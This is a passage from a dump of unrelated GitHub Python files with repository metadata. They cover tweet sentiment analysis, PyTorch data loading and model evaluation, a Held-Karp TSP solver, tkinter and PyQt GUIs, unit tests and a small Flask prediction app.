uniqueName)\n\n","repo_name":"aliasger3008/GWL-time-series-analysis","sub_path":"Scraping/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33191131203","text":"# List of our semantic tags\nTAG_DEVICE = 'Device'\nTAG_INSTANCE = 'Instance'\nTAG_INSTANCE_TYPE = 'InstanceType'\nTAG_ARCHITECTURE = 'Architecture'\nTAG_ENA_SUPPORT = 'EnaSupport'\nTAG_AVAILABILITY_ZONE = 'AvailabilityZone'\nTAG_IAM_PROFILE_ARN = 'IamProfileArn'\nTAG_IAM_PROFILE_ID = 'IamProfileId'\nTAG_SECURITY_GROUPS = 'SecurityGroups'\n\n# Set of useful and common function\n\ndef get_name_from_tags(tags):\n '''\n Find the Value associated with the Tag Key \"Name\" (if it exists)\n :param tags: array of {Key:k, Value:v}\n :return: the Name Value or \"\"\n '''\n for tag in tags:\n if tag['Key'] == 'Name':\n return tag['Value']\n\n return \"\"\n\n","repo_name":"majeinfo/aws_disaster_recovery","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5940034905","text":"from tkinter import *\n\n\ndef button_clicked():\n my_label.config(text=input.get()) # get() is used to get the text from the entry\n\n# Window\nwindow = Tk()\nwindow.title(\"My first GUI program\")\nwindow.minsize(width=500, height=300)\nwindow.config(padx=20, pady=20) # padding\n \n# Label\nmy_label = Label(text=\"I am a label\", font=(\"Arial\", 24, \"italic\"))\nmy_label.grid(column= 0, row = 0) # pack() is used to show the label on the screen\n\n# Button\nnew_button = Button(text=\"Click Me\") # button is an object\nnew_button.grid(column = 2, row = 0) # pack() is used to show the button on the screen\n\nbutton = Button(text=\"Click Me\", command = button_clicked) # button is an object\nbutton.grid(column = 1, row = 1) # pack() is used to show the button on the screen\n\n\n# Entry\ninput = Entry(width=10)\ninput.grid(column = 3, row = 2) # pack() is used to show the entry on the screen\n \n\n\n\n\n\n\n\n\n\n\n\nwindow.mainloop()\n\n","repo_name":"michaelnyirenda/python-projects","sub_path":"mile to km converter/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9846407273","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose: Social Media Mining Project\r\n#\r\n# Author: Saurabh kumar\r\n# Format: PEP 8\r\n# Created: 12/09/2016\r\n# Copyright: (c) Saurabh kumar 2016\r\n# Licence: \r\n# Description: This code performs Sentiment Analysis on #Deflategate twitter data.\r\n#-------------------------------------------------------------------------------\r\n\r\n\r\n#Package Imports\r\nimport nltk\r\nimport re\r\nimport csv\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import PorterStemmer\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom random import shuffle\r\nfrom wordcloud import WordCloud\r\n\r\n\r\n#Initializing for short usage\r\nstopset = list(set(stopwords.words('english')))\r\nps = PorterStemmer()\r\nlemm = WordNetLemmatizer()\r\n\r\n\r\n#Function for basic preprocessing of the tweets\r\ndef preprocess(y):\r\n\r\n #The following code removes links, special characters etc.\r\n y = re.sub(r'http\\S+', ' ', y)\r\n y = re.sub(r'[^\\x00-\\x7f]', r' ', y)\r\n y = re.sub(r'[^a-zA-Z]+', r' ', y)\r\n y = re.sub(r'\\b\\w{1,2}\\b', r' ', y)\r\n\r\n return (y)\r\n\r\n\r\n#Function for advanced preprocessing of the tweets; Removing Stopwords, tokenizing and stemming\r\ndef advprocess(y):\r\n\r\n #tokenizing using word_tokenize function from nltk package\r\n y = nltk.word_tokenize(y)\r\n\r\n #The following code make use of list comprehension for compact view\r\n y = [word for word in y if word not in stopset]\r\n y = [lemm.lemmatize(word) for word in y]\r\n #y = [ps.stem(word) for word in y]\r\n\r\n #Returning a dictionary as it is a suitable datatype for Naive Bayes Classifier\r\n return dict([(word, True) for word in y])\r\n\r\n\r\n#Function to be used as a substitute for above advprocess()\r\n#Returns a dictionary to be used for Naive Bayes Classifier\r\ndef word_feats(words):\r\n\r\n return [word for word in words.split() if word not in stopset]\r\n\r\n\r\n#Function to classify sentiment for tweets in the test_set.\r\n#Uses Naive Bayes Classifier\r\ndef classify_naivebayes(train_set, test_set):\r\n\r\n #Training Naive Bayes\r\n classifier = nltk.NaiveBayesClassifier.train(train_set)\r\n\r\n #Classifying the test set\r\n output = [classifier.classify(text) for text in test_set]\r\n\r\n return output\r\n\r\n\r\n#Function to find the main context of data\r\ndef find_contexts(test_data):\r\n\r\n #Categorizing contexts in four groups based on specific conditions\r\n if \"organization\" in test_data.lower() or \"management\" in test_data.lower():\r\n return (\"Management\")\r\n\r\n elif \"tom\" in test_data.lower() or \"brady\" in test_data.lower():\r\n return (\"Tom Brady\")\r\n\r\n elif \"patriots\" in test_data.lower():\r\n return (\"Patriots\")\r\n\r\n else:\r\n return (\"Other\")\r\n\r\n\r\n#Function for finding insights in the tweets and comparison statistics\r\ndef analysis (contexts, sentiments):\r\n\r\n #initializing different type of sentiments - They store the value of number of tweets belonging to a specific category\r\n irrelevant_sentiments = 0\r\n positive_sentiments = 0\r\n negative_sentiments = 0\r\n neutral_sentiments = 0\r\n\r\n #initializing intermediate values\r\n mgt_positive = 0\r\n mgt_negative = 0\r\n tom_positive = 0\r\n tom_negative = 0\r\n pat_positive = 0\r\n pat_negative = 0\r\n\r\n #For calculating different values\r\n for i in range(len(contexts)):\r\n\r\n #Calculating the number of tweets in each sentiment category\r\n if sentiments[i] == 'positive':\r\n positive_sentiments+=1\r\n\r\n if contexts[i] == 'Management':\r\n mgt_positive += 1\r\n\r\n elif contexts[i] == 'Tom Brady':\r\n tom_positive += 1\r\n\r\n elif contexts[i] == 'Patriots':\r\n pat_positive += 1\r\n\r\n\r\n elif sentiments[i] == 'negative':\r\n negative_sentiments+=1\r\n\r\n if contexts[i] == 'Management':\r\n mgt_negative+=1\r\n\r\n elif contexts[i] == 'Tom Brady':\r\n tom_negative+=1\r\n\r\n elif contexts[i] == 'Patriots':\r\n pat_negative+=1\r\n\r\n elif sentiments[i] == 'neutral':\r\n neutral_sentiments+=1\r\n\r\n elif sentiments[i] == 'irrelevant':\r\n irrelevant_sentiments+=1\r\n\r\n else:\r\n print (\"Discrepancy\")\r\n\r\n #Creating a dictionary for different sentiment statistics\r\n sentiment_stat = {'irrelevant': irrelevant_sentiments, 'neutral': neutral_sentiments, 'positive': positive_sentiments, 'negative': negative_sentiments}\r\n\r\n #Creating a dictionary for different blame statistics\r\n blame_stat = {'Management': mgt_negative,'Tom Brady': tom_negative,'Patriots':pat_negative}\r\n\r\n #Creating a dictionary for different support statistics\r\n support_stat = {'Management': mgt_positive,'Tom Brady': tom_positive,'Patriots': pat_positive}\r\n\r\n #Stats to compare blame and support for Tom Brady\r\n tom_stat = {'Blame':tom_negative,'Support':tom_positive}\r\n\r\n # Stats to compare blame and support for Patriots\r\n pat_stat = {'Blame':pat_negative,'Support':pat_positive}\r\n\r\n #Calling graph function to plot histograms for various statistics\r\n graphs(sentiment_stat, blame_stat, support_stat, tom_stat, pat_stat)\r\n\r\n\r\n#Function to create graphs for the different findings\r\ndef graphs(sentiment_stat, blame_stat, support_stat, tom_stat, pat_stat):\r\n\r\n #Create Sentiment Statistics Histogram\r\n jet = plt.get_cmap('jet')\r\n plt.bar(range(len(sentiment_stat)), sentiment_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(sentiment_stat))))\r\n plt.xticks(range(len(sentiment_stat)), list(sentiment_stat.keys()))\r\n plt.xlabel('Sentiments')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Sentiment Statistics')\r\n plt.show()\r\n\r\n #Comparing blame and support statistics for Tom Brady\r\n plt.bar(range(len(tom_stat)), tom_stat.values(), align='center',color=jet(np.linspace(0, 1.0, len(tom_stat))))\r\n plt.xticks(range(len(tom_stat)), list(tom_stat.keys()))\r\n plt.xlabel('View')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Tom Brady Statistics')\r\n plt.show()\r\n\r\n #Comparing blame and support statistics for Patriots\r\n plt.bar(range(len(pat_stat)), pat_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(pat_stat))))\r\n plt.xticks(range(len(pat_stat)), list(pat_stat.keys()))\r\n plt.xlabel('View')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Patriots Statistics')\r\n plt.show()\r\n\r\n #Create Blame Statistics Histogram\r\n plt.bar(range(len(blame_stat)), blame_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(blame_stat))))\r\n plt.xticks(range(len(blame_stat)), list(blame_stat.keys()))\r\n plt.xlabel('Blamed')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Blame Statistics')\r\n plt.show()\r\n\r\n #Create Supportt Statistics Histogram\r\n plt.bar(range(len(support_stat)), support_stat.values(), align='center', color=jet(np.linspace(0, 1.0, len(support_stat))))\r\n plt.xticks(range(len(support_stat)), list(support_stat.keys()))\r\n plt.xlabel('Support')\r\n plt.ylabel('Number of Tweets')\r\n plt.title('Support Statistics')\r\n plt.show()\r\n\r\n\r\ndef word_cloud(text):\r\n\r\n #Removing stop words\r\n text = [word_feats(words) for words in text]\r\n\r\n #Generate a word cloud image\r\n wordcloud = WordCloud().generate(str(text))\r\n\r\n #Plot the wordcloud\r\n plt.imshow(wordcloud)\r\n plt.axis(\"off\")\r\n plt.show()\r\n\r\n\r\n#Primary function thats holds the logic for entire analysis\r\ndef context_sentiment_analysis():\r\n\r\n #Fetching the test data and train data\r\n data = pd.read_csv(\"input.csv\", encoding = 'latin1')\r\n train_data = pd.read_csv(\"corpus.csv\", encoding = 'latin1')\r\n\r\n\r\n #Preprocessing Test and Train data\r\n data.text = [preprocess(text) for text in data.text]\r\n train_data.TweetText = [preprocess(text) for text in train_data.TweetText]\r\n #data.text = [advprocess(text) for text in data.text]\r\n #train_data.TweetText = [advprocess(text) for text in train_data.TweetText]\r\n\r\n #Splitting Training data into Irrelevant, neutral, positive and negative tweets.\r\n #This helps in better processing and training Naive Bayes Classifier\r\n irrids = list(train_data.TweetText[:1689])\r\n negids = list(train_data.TweetText[1690:2261])\r\n netids = list(train_data.TweetText[2262:4595])\r\n posids = list(train_data.TweetText[4596:])\r\n\r\n #Applying advanced processing on the training tweets\r\n pos_feats = [(advprocess(f), 'positive') for f in posids]\r\n neg_feats = [(advprocess(f), 'negative') for f in negids]\r\n irr_feats = [(advprocess(f), 'irrelevant') for f in irrids]\r\n net_feats = [(advprocess(f), 'neutral') for f in netids]\r\n\r\n #Getting the complete list of tweets for training\r\n trainfeats = irr_feats + pos_feats + neg_feats + net_feats\r\n\r\n #Shuffling the different category of tweets to mix them up\r\n shuffle(trainfeats)\r\n\r\n #Preparing Test set\r\n test_set = list(advprocess(words) for words in data.text)\r\n\r\n #Finding Sentiments for the Test set\r\n output_sentiments = classify_naivebayes(trainfeats, test_set)\r\n\r\n #Finding Contexts for the Test set\r\n output_contexts = [find_contexts(data) for data in data.text]\r\n\r\n #Analysing the results of sentiment and context classification\r\n analysis(output_contexts, output_sentiments)\r\n\r\n #Getting the wordcloud out of the tweets\r\n word_cloud(data.text)\r\n\r\n #Writing Sentiments, contexts and tweets to the output file\r\n output = pd.DataFrame({\"Sentiments\": output_sentiments, \"Contexts\": output_contexts, \"Tweets\": data.text})\r\n output.to_csv(\"output_sentiments.csv\", index=False)\r\n\r\n #Alternate method of writing to the output file\r\n #with open('output_sentiments.csv', 'w') as myfile:\r\n # wr = csv.writer(myfile)\r\n # wr.writerow(list(output_sentiments))\r\n\r\n\r\n#Executes when the code is used as a script\r\nif __name__ == '__main__':\r\n\r\n #Calling the primary function for context and sentiment analysis\r\n context_sentiment_analysis()\r\n\r\n\r\n","repo_name":"saurabhkumar04/Deflategate-Analysis","sub_path":"socialmm.py","file_name":"socialmm.py","file_ext":"py","file_size_in_byte":10157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38378936085","text":"import torch\nfrom estcnn import *\nfrom AmblyopiaDatasetPaper import *\nfrom torch.utils.data.dataloader import DataLoader\nimport matplotlib.pyplot as plt\nimport os\n\ndata_length = [250,500,1000,1500,2000,2500,3000]\nratio = [0.5,1,2,3,4,5,6]\nepoch = 20\ndataset_path = r\"E:\\Dataset\\amplyopia\"\nmodel_path = r\"E:\\pythonProject\\EGG\\Paper\\amplyopia\\epoch\" + str(epoch) + \"\\ESTCNN_net_\"\n\nresult_dir = \"./epoch\" + str(epoch) + \"/result\"\nos.makedirs(result_dir,exist_ok=True)\nwith open(result_dir+\"/result.txt\",\"w\") as f:\n plt.title(\"Amblyopia Dataset in \"+str(epoch) + \" epochs\")\n plt.ylim([97, 100])\n plt.xlabel(\"ratio of sample rate\")\n plt.ylabel(\"accuracy\")\n\n for index, length in enumerate(data_length):\n model_name = model_path + str(length) + \".pth\"\n net = ESTCNN(16, length)\n dataset_path = r\"E:\\Dataset\\amplyopia\"\n dataset = AmblyopiaDataset(dataset_path, length)\n batch_size = 16\n correct = 0\n net.load_state_dict(torch.load(model_name))\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n net = net.to(device)\n dataloader = DataLoader(dataset=dataset, batch_size=batch_size)\n net.eval()\n with torch.no_grad():\n for x, y in dataloader:\n x = x.to(device).type(torch.cuda.FloatTensor)\n y = y.to(device)\n pred_y = torch.argmax(net(x), axis=1)\n correct += (pred_y == y).sum().item()\n\n accuracy = round(100 * correct / len(dataset), 2)\n print(accuracy)\n f.write(str(accuracy) + \"\\n\")\n\n plt.scatter(ratio[index], accuracy, c='b')\n\n plt.savefig(result_dir+\"/result.png\")\n plt.show()","repo_name":"Stanwang218/AmblyopiaResearch","sub_path":"AmblyopiaValidate.py","file_name":"AmblyopiaValidate.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25658913128","text":"# coding: utf-8\nimport os\nimport torch\nimport pandas as pd\nimport numpy as np\n\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor, Lambda\n\nimport matplotlib.pyplot as plt\nfrom torchvision.io import read_image\nfrom torch.utils.data import DataLoader\n\"\"\"\n @Time : 2021/4/29 17:37\n @Author : houjingru@semptian.com\n @FileName: 4_Dataloaders.py\n @Software: PyCharm\n\"\"\"\n\n\n\"\"\"\n 一:加载数据集\n\"\"\"\ntraining_data = datasets.FashionMNIST(\n root=\"data\",\n train=True,\n download=True,\n transform=ToTensor()\n)\n\ntest_data = datasets.FashionMNIST(\n root=\"data\",\n train=False,\n download=True,\n transform=ToTensor()\n)\n\"\"\"\n 二:迭代和可视化数据\n\"\"\"\nlabels_map = {\n 0: \"T-Shirt:T恤\",\n 1: \"Trouser:长裤\",\n 2: \"Pullover:套衫\",\n 3: \"Dress:着装\",\n 4: \"Coat:外套\",\n 5: \"Sandal:凉鞋\",\n 6: \"Shirt:衬衫\",\n 7: \"Sneaker:运动鞋\",\n 8: \"Bag:包\",\n 9: \"Ankle Boot:踝靴\",\n}\n\n\"\"\"\n 三:创建自定义数据集\n\"\"\"\n\n\nclass CustomImageDataset(Dataset):\n \"\"\"\n 创建自定义数据集\n \"\"\"\n def __init__(self, annotations_file, img_dir, transform=None, target_transform=None):\n self.img_labels = pd.read_csv(annotations_file)\n self.img_dir = img_dir\n self.transform = transform\n self.target_transform = target_transform\n\n def __len__(self):\n return len(self.img_labels)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.img_dir, self.img_labels.iloc[idx, 0])\n image = read_image(img_path)\n label = self.img_labels.iloc[idx, 1]\n if self.transform:\n image = self.transform(image)\n if self.target_transform:\n label = self.target_transform(label)\n\n sample = {\"image\": image, \"label\": label}\n return sample\n\n\n\"\"\"\n 四:准备数据,使用DataLoader进行模型训练\n\"\"\"\ntrain_dataloader = DataLoader(training_data, batch_size=64, shuffle=True)\ntest_dataloader = DataLoader(test_data, batch_size=64, shuffle=True)\n\n\n\"\"\"\n 五:使用DataLoader遍历数据\n\"\"\"\ntrain_features, train_labels = next(iter(train_dataloader))\nprint(f\"Feature batch shape: {train_features.size()}\")\nprint(f\"Labels batch shape: {train_labels.size()}\")\n\nimg = train_features[0].squeeze()\nlabel = train_labels[0]\n\nplt.imshow(img, cmap=\"gray\")\nplt.show()\nprint(f\"Label: {label}\")\n","repo_name":"jingruhou/hjrPyTorch","sub_path":"1_base/4_Dataloaders.py","file_name":"4_Dataloaders.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70334846553","text":"import os\nfrom torch.utils.data import DataLoader, Dataset\nimport time\nimport glob\n\n\nclass MyDataset(Dataset):\n def __init__(self):\n self.IN = 'video-high/'\n self.OUT = 'faces/'\n\n self.files = glob.glob(os.path.join(self.IN, 's*', '*.mpg'))\n\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, idx):\n file = self.files[idx] # video-high/s1/bbcnzze.mpg\n _, ext = os.path.splitext(file)\n dst = file.replace(self.IN, self.OUT).replace(ext, '')\n\n if not os.path.exists(dst):\n os.makedirs(dst)\n\n cmd = 'ffmpeg -i {} -qscale:v 2 -r 25 {}/%d.jpg'.format(file, dst)\n os.system(cmd)\n return dst\n\n\nif __name__ == '__main__':\n dataset = MyDataset()\n loader = DataLoader(dataset, num_workers=32, batch_size=128, shuffle=False, drop_last=False)\n tic = time.time()\n for (i, batch) in enumerate(loader):\n eta = (1.0 * time.time() - tic) / (i + 1) * (len(loader) - i)\n print('eta:{}'.format(eta / 3600.0))\n","repo_name":"LindgeW/DoLipReading","sub_path":"Processing/extract_frame.py","file_name":"extract_frame.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"7084912546","text":"import itertools\r\nimport time\r\n\r\n\r\ndef solve_tsp(matrix: list):\r\n MATRIX_SIZE = len(matrix)\r\n VERTICES = list(range(1, MATRIX_SIZE)) # lista wierzcholkow z pomienieciem zerowego\r\n PRE = {} # obiekt przechowujacy informacje o poprzedzajacych wierzcholkach (do odtwarzania sciezki)\r\n COST = {} # { (xi, S): V } -- gdzie V to koszt przejscia z wierzcholka xi do 0-wego przechodzac przez wszystkie wierzcholki w zbiorze S dokladnie raz\r\n\r\n start_time = time.time_ns()\r\n\r\n # wczytanie pojedynczych kosztow przejscia (z kazdego wierzcholka do 0-wego)\r\n for k in VERTICES:\r\n COST[(k, (k,))] = matrix[0][k]\r\n\r\n # obliczenie pozostalych kosztow przejsc\r\n for k in range(2, MATRIX_SIZE):\r\n # print(f'[{k}/{MATRIX_SIZE-1}] ', end='\\r')\r\n # wszystkie kombinacje zbiorow wierzcholkow o danej dlugosci k -- [(1, 2, 3), (1, 2, 4), (1, 3, 4), (2, 3, 4), ...]\r\n subsets = itertools.combinations(VERTICES, k)\r\n\r\n # dla kazdego zbioru ze zbiorow kombinacji\r\n for set in subsets:\r\n # dla kazdego wierzcholka w zbiorze\r\n for xi in set:\r\n new_set = tuple(x for x in set if x != xi) # utworzenie nowego zbioru bez obecnie sprawdzanego wierzcholka\r\n\r\n min_cost = float('inf') # najmniejszy koszt przejcia\r\n min_pre = None # wierzcholek i sciezka poprzedzajace najmniejszy koszt przejscia\r\n\r\n # dla kazdego wierzcholka w nowym zbiorze\r\n for xj in new_set:\r\n cost = COST[(xj, new_set)] + matrix[xj][xi] # dodanie kosztu przejscia\r\n\r\n # jezeli koszt przejscia jest mniejszy niz obecnie zapisany to zapisz poprzedzajacy wierzcholek\r\n if cost < min_cost:\r\n min_cost = cost\r\n min_pre = (xj, new_set)\r\n\r\n COST[(xi, set)] = min_cost # zapisanie kosztu przejscia z wierzcholka 'xi' do 0-wego przez wszystkie punktu ze zbioru 'set'\r\n PRE[(xi, set)] = min_pre # zapisanie informacji o poprzedzajacym wierzcholku 'xj' i sciezce 'S\\{xi}'\r\n\r\n del new_set\r\n del set\r\n \r\n solution, path = backtrack(matrix, COST, PRE, VERTICES)\r\n\r\n stop_time = time.time_ns()\r\n work_time = round((stop_time - start_time) * 10**(-9), 2)\r\n\r\n return {\r\n 'time': work_time,\r\n 'solution': solution,\r\n 'path': tuple(path)\r\n }\r\n\r\n\r\ndef backtrack(matrix: list, COST: dict, PRE: dict, VERTICES: list):\r\n cost_keys = list(COST.keys())\r\n max_cost_keys = cost_keys[-len(VERTICES):] # lista najdluzszych zestawow\r\n\r\n solution = float('inf')\r\n pre = None\r\n\r\n # znalezienie rozwiazania z najwiekszych zbiorow wraz z poprzedzajacym je wierzcholkiem\r\n for key in max_cost_keys:\r\n cost = COST[key] + matrix[key[0]][0]\r\n if cost < solution:\r\n solution = cost\r\n pre = key\r\n\r\n path = [0, pre[0]]\r\n\r\n # backtracking po zapisanych poprzedzajacych wierzcholkach\r\n cost_keys.reverse()\r\n current_set = pre\r\n while len(current_set[1]) != 1:\r\n path.append(PRE[current_set][0])\r\n current_set = PRE[current_set]\r\n path.append(0)\r\n\r\n return solution, path\r\n","repo_name":"macie-kk/PEA","sub_path":"2. DP - Held Karp/src/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15770785264","text":"from datetime import datetime\nimport unittest\n\nfrom ddt import ddt, data\n\nfrom timebook import payperiodtypes\n\n\n@ddt\nclass TestPayPeriodCalculations(unittest.TestCase):\n @data(\n (\n datetime(2013, 5, 1),\n datetime(2013, 4, 1),\n datetime(2013, 5, 2),\n ),\n (\n datetime(2013, 4, 28),\n datetime(2013, 3, 29),\n datetime(2013, 4, 29),\n ),\n )\n def test_rolling_30_day_window_calculations(self, value):\n date, begin_period, end_period = value\n instance = payperiodtypes.Rolling30DayWindow(date)\n self.assertEquals(\n instance.begin_period,\n begin_period\n )\n self.assertEquals(\n instance.end_period,\n end_period\n )\n\n @data(\n (\n datetime(2013, 5, 1),\n datetime(2013, 4, 20),\n datetime(2013, 5, 25),\n ),\n (\n datetime(2013, 4, 18),\n datetime(2013, 3, 23),\n datetime(2013, 4, 20),\n ),\n )\n def test_monthly_on_second_to_last_friday_calculations(self, value):\n date, begin_period, end_period = value\n instance = payperiodtypes.MonthlyOnSecondToLastFriday(date)\n self.assertEquals(\n instance.begin_period,\n begin_period\n )\n self.assertEquals(\n instance.end_period,\n end_period\n )\n","repo_name":"coddingtonbear/timebook","sub_path":"tests/test_payperiodtypes.py","file_name":"test_payperiodtypes.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"5"} +{"seq_id":"3741686304","text":"from PyQt5.QtCore import QUrl \nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtMultimedia import QMediaPlayer\nfrom PyQt5.QtMultimedia import QMediaPlaylist\nfrom PyQt5.QtMultimedia import QMediaContent\nimport os\n\n# need to modify in buddingMainWindow.py:\n#self.voiceButton = buddingMusic.BuddingVoice(self.tailWidget, self.controller)\n\nclass BuddingVoice(QtWidgets.QPushButton):\n def __init__(self, parent, controller):\n super(BuddingVoice, self).__init__(parent)\n # music button config.\n self.controller = controller\n self.controller.register_observer(\"music_button\", self)\n self.clicked.connect(self.voice_clicked)\n self.musicon = 1\n\n #playlist, set according to level\n self.playlist = QMediaPlaylist()\n self.url = None\n self.level = self.controller.get_level()\n print(\"user level\", self.level)\n #below is for test\n #self.level = 3\n self.url = self.choose_music(self.level)\n self.playlist.addMedia(QMediaContent(self.url))\n self.playlist.setPlaybackMode(QMediaPlaylist.Loop)\n \n #player\n self.player = QMediaPlayer()\n self.player.setPlaylist(self.playlist)\n self.player.play()\n\n def voice_clicked(self):\n if self.musicon:\n self.player.pause()\n else:\n #below is for test on_level_update\n #self.on_level_update()\n self.player.play()\n self.musicon = 1 - self.musicon\n\n def on_level_update(self, newlevel):\n #below is for test\n #newlevel = self.level + 1\n print(\"newlevel\", newlevel, \"oldlevel\", self.level)\n self.player.pause()\n self.playlist.removeMedia(0)\n self.url = self.choose_music(newlevel)\n self.playlist.addMedia(QMediaContent(self.url))\n self.player.setPlaylist(self.playlist)\n self.player.play()\n self.level = newlevel\n\n def music_path(self, music):\n fp = \"./music/\" + music\n return os.path.abspath(fp)\n\n def choose_music(self, level):\n mystr = \"\"\n if level == 1:\n mystr = self.music_path(\"sad.mp3\")\n elif level == 2:\n mystr = self.music_path(\"neutral.mp3\")\n else:\n mystr = self.music_path(\"happy.mp3\")\n return QUrl.fromLocalFile(mystr)\n\n def on_logout(self):\n self.musicon = 0\n self.player.stop()","repo_name":"hreatx/TYTS","sub_path":"buddingMusic.py","file_name":"buddingMusic.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"12733804948","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom flask import Flask, request, render_template\nimport joblib\n\n\n# In[2]:\n\n\napp = Flask(__name__)\n\n\n# In[3]:\n\n\n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef i():\n if request.method == \"POST\":\n inc = float(request.form.get(\"income\"))\n print(inc)\n aged = float(request.form.get(\"age\"))\n print(aged)\n loa = float(request.form.get(\"loan\"))\n print(aged)\n xgb_model = joblib.load(\"CRE\")\n xgb_pred = xgb_model.predict([[inc,aged,loa]])\n\n return(render_template(\"index.html\", result3 = xgb_pred))\n else:\n return render_template(\"index.html\", result =\"GET METHOD\")\n\n\n# In[ ]:\n\n\nif __name__==\"__main__\":\n app.run()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Winnwu/CreditCardDefault","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16347209216","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport tkinter as tk # 使用Tkinter前需要先导入\nfrom PIL import Image, ImageTk\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\n\nfrom functions.log4py import print_log\nfrom gui.ui.globel_varable import set_value\nfrom gui.ui.globel_varable import get_value\nfrom gui.ui.month_transaction import create_grandet_bills_window_by_month\nfrom gui.ui.detail_page import show_detail_page\n\nfrom functions.read_table import ReadTransactionTable\nfrom functions.log4py import print_log\n\nfrom modules.transaction_extract import ExtractTransactions\n\nfrom modules.transaction import YearsTransaction\nfrom modules.transaction import MonthsTransaction\nfrom modules.transactions_tools import TransactionsTools\n\n\ndef fill_bill_files(bill_frame: tk.Frame, file_names: list) -> tk.Frame:\n \n # 左侧账单文件列表\n # bill_frame = tk.Frame(root)\n # bill_frame = tk.Frame(root, width=20) # 设置列表框架宽度为窗口宽度的1/4\n # bill_frame.pack(side=\"left\", fill=\"both\", expand=True)\n bill_frame.pack(side=\"left\", fill=\"y\", expand=True)\n\n bill_header = tk.Label(bill_frame, text=\"📁 账单文件列表\")\n bill_header.pack(side=\"top\")\n \n bill_list = tk.Listbox(bill_frame)\n for index, file_name in enumerate(file_names):\n bill_list.insert(index, \"📃:\" + file_name)\n \n bill_list.pack(side=\"top\", fill=\"both\", expand=True)\n \n log_label = tk.Label(bill_frame, text=\"📔 日志\")\n log_label.pack(side=\"top\")\n\n log_text = tk.Text(bill_frame, height=10)\n log_text.pack(side=\"bottom\", fill=\"both\", expand=True)\n \n return bill_frame\n\n\ndef fill_bill_information(yearly_summary: tk.Frame, root: tk.Tk, head_words: list, months: list, year: int) -> tk.Frame:\n \n # 右侧每年花销简介\n # yearly_summary = tk.Frame(root)\n yearly_summary.pack(side=\"right\", fill=\"both\", expand=True)\n\n header = tk.Frame(yearly_summary)\n header.pack(side=\"top\", fill=\"x\")\n\n year_header = tk.Label(header, text=head_words[0], width=10)\n year_header.pack(side=\"left\")\n\n summary_header = tk.Label(header, text=head_words[1], width=10)\n summary_header.pack(side=\"left\")\n\n expenditure_header = tk.Label(header, text=head_words[2], width=15)\n expenditure_header.pack(side=\"left\")\n\n income_header = tk.Label(header, text=head_words[3], width=15)\n income_header.pack(side=\"left\")\n\n transfer_header = tk.Label(header, text=head_words[4], width=20)\n transfer_header.pack(side=\"left\")\n \n all_transfer_header = tk.Label(header, text=head_words[5], width=20)\n all_transfer_header.pack(side=\"left\")\n\n details_header = tk.Label(header, text=head_words[6], width=10)\n details_header.pack(side=\"right\")\n \n details_header = tk.Label(header, text=head_words[7], width=10)\n details_header.pack(side=\"right\")\n\n # 分割线\n separator = tk.Frame(yearly_summary, height=2, bd=1, relief=\"sunken\")\n separator.pack(fill=\"x\", padx=5, pady=5)\n\n for month, summary, expenditure_count, income_count, transfer_count, all_transfer_count in months:\n month_row = tk.Frame(yearly_summary)\n month_row.pack(side=\"top\", fill=\"x\")\n\n month_label = tk.Label(month_row, text=month, width=10)\n month_label.pack(side=\"left\")\n\n summary_label = tk.Label(month_row, text=str(f\"{summary:.2f}\"), width=10)\n summary_label.pack(side=\"left\")\n\n expenditure_label = tk.Label(month_row, text=str(expenditure_count), width=15)\n expenditure_label.pack(side=\"left\")\n\n income_label = tk.Label(month_row, text=str(income_count), width=15)\n 